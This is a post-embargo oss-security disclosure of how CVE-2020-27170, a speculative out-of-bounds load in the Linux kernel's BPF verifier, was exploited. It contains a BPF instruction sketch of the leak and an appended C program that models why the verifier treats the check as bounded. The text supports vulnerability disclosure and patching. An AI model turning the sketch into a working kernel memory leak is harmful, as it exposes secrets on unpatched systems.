
List:       oss-security
Subject:    [oss-security] Re: [CVE-2020-27170] Protection against speculatively out-of-bounds loads in the Linu
From:       Piotr Krysiuk <piotras () gmail ! com>
Date:       2021-03-24 19:34:50
Message-ID: CAFzhf4rREUjn4=Z45GBxvo4CAvf5=xPEiu3O0rpnWF3hR-7AxQ () mail ! gmail ! com

Some details of how CVE-2020-27170 could be exploited in practice were
provided via the linux-distros mailing list with a 7-day embargo. This was
intended to help any affected Linux distributions to assess the risk
and decide on any appropriate actions.

As the embargo expires today, I was asked to share these details
publicly on oss-security.

The CVE-2020-27170 vulnerability has been successfully reproduced
against Linux kernel v5.12-rc3 using the following logic for a BPF
program attached to a socket:

    load bpf_context pointer (BPF_REG_1) into BPF_REG_CTX,
    load pointer to our big array into BPF_REG_MAP_PTR,
    load offset of data to leak into BPF_REG_OFFSET,

    // load any slowly-loaded value...
    BPF_LDX_MEM(BPF_DW, BPF_REG_SLOW_CHECK, BPF_REG_MAP_PTR, 0x1200),

    // ... and turn it into known zero for verifier,
    // while preserving slowly-loaded dependency for affected hardware
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 1),
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 2),

    // speculatively bypassed offset check
    BPF_JMP_REG(BPF_JNE, BPF_REG_OFFSET, BPF_REG_SLOW_CHECK,
                skip_speculation),

    // speculatively unbounded pointer arithmetic
    BPF_ALU64_REG(BPF_ADD, BPF_REG_CTX, BPF_REG_OFFSET),

    // speculatively unbounded load
    BPF_LDX_MEM(BPF_W, BPF_REG_LEAKED_WORD, BPF_REG_CTX,
                offsetof(struct __sk_buff, protocol)),

    transmit speculatively loaded BPF_REG_LEAKED_WORD via side-channel,

The full reproducers were shared with a number of Linux distributions
for protection purposes.
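The two BPF_AND instructions in the sketch above are the crux: they leave the register dependent on the slow map load for the hardware, while the verifier's value tracking concludes the register is a known constant zero, so the JNE fallthrough looks like a proper bounds check on BPF_REG_OFFSET. The following program is an added illustration written for this page, not code from the original message or from the kernel; it re-implements the kernel's tristate-number (tnum) AND rule in userspace to show that reasoning step by step. The function names and the simplified model of the fallthrough branch reasoning are assumptions made for illustration.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Tristate number, modelled on the kernel's tnum representation:
 * a bit is known when its mask bit is 0; its value is then in `value`.
 * Re-implemented here as an added example, not taken from the kernel tree. */
struct tnum {
    uint64_t value;
    uint64_t mask;
};

static struct tnum tnum_const(uint64_t v)   { return (struct tnum){ v, 0 }; }
static struct tnum tnum_unknown(void)       { return (struct tnum){ 0, ~0ULL }; }
static bool        tnum_is_const(struct tnum a) { return a.mask == 0; }

/* AND of two tristate numbers: a result bit can only be 1 where both
 * inputs may be 1; it is known 1 only where both inputs are known 1. */
static struct tnum tnum_and(struct tnum a, struct tnum b)
{
    uint64_t alpha = a.value | a.mask;   /* bits that may be 1 in a */
    uint64_t beta  = b.value | b.mask;   /* bits that may be 1 in b */
    uint64_t v     = a.value & b.value;  /* bits known 1 in result */
    return (struct tnum){ v, alpha & beta & ~v };
}

/* Verifier's view of BPF_REG_SLOW_CHECK after
 *   BPF_ALU64_IMM(BPF_AND, r, 1); BPF_ALU64_IMM(BPF_AND, r, 2);
 * The loaded value is unknown, the first AND leaves only bit 0 unknown,
 * the second AND clears that bit too, giving a known constant 0. */
struct tnum verifier_view_of_slow_check(void)
{
    struct tnum r = tnum_unknown();
    r = tnum_and(r, tnum_const(1));
    r = tnum_and(r, tnum_const(2));
    return r;
}

/* What the CPU actually computes for a concrete loaded value: also 0,
 * but the result is data-dependent on the load, so a branch comparing
 * against it cannot resolve before the (slow) load returns. */
uint64_t hardware_slow_check(uint64_t loaded)
{
    return (loaded & 1) & 2;
}

/* Simplified model of the verifier on the fallthrough (equal) path of
 *   BPF_JMP_REG(BPF_JNE, OFFSET, SLOW_CHECK, skip):
 * if SLOW_CHECK is a known constant, OFFSET is refined to that constant.
 * Hypothetical helper for illustration; the real verifier logic is more
 * involved but reaches the same conclusion for this sequence. */
struct tnum verifier_offset_on_fallthrough(struct tnum offset, struct tnum check)
{
    return tnum_is_const(check) ? check : offset;
}

/* True when the verifier would accept CTX + OFFSET as in-bounds here,
 * i.e. it believes OFFSET is exactly 0 on the fallthrough path. */
bool verifier_accepts_unbounded_add(void)
{
    struct tnum off = verifier_offset_on_fallthrough(tnum_unknown(),
                                                     verifier_view_of_slow_check());
    return tnum_is_const(off) && off.value == 0;
}

int main(void)
{
    struct tnum chk = verifier_view_of_slow_check();
    printf("verifier: SLOW_CHECK value=%llu mask=%llu (%s)\n",
           (unsigned long long)chk.value, (unsigned long long)chk.mask,
           tnum_is_const(chk) ? "known constant" : "unknown bits");
    printf("hardware: SLOW_CHECK for loaded=0xdeadbeef -> %llu (load-dependent)\n",
           (unsigned long long)hardware_slow_check(0xdeadbeefULL));
    printf("verifier treats CTX + OFFSET as bounded: %s\n",
           verifier_accepts_unbounded_add() ? "yes" : "no");
    return 0;
}
```

The program prints that the verifier sees SLOW_CHECK as the constant 0 and therefore treats OFFSET as 0 after the JNE, while the hardware value is only available once the load completes; until then the branch is predicted and the pointer add and load on the fallthrough path run speculatively with whatever OFFSET the attacker chose.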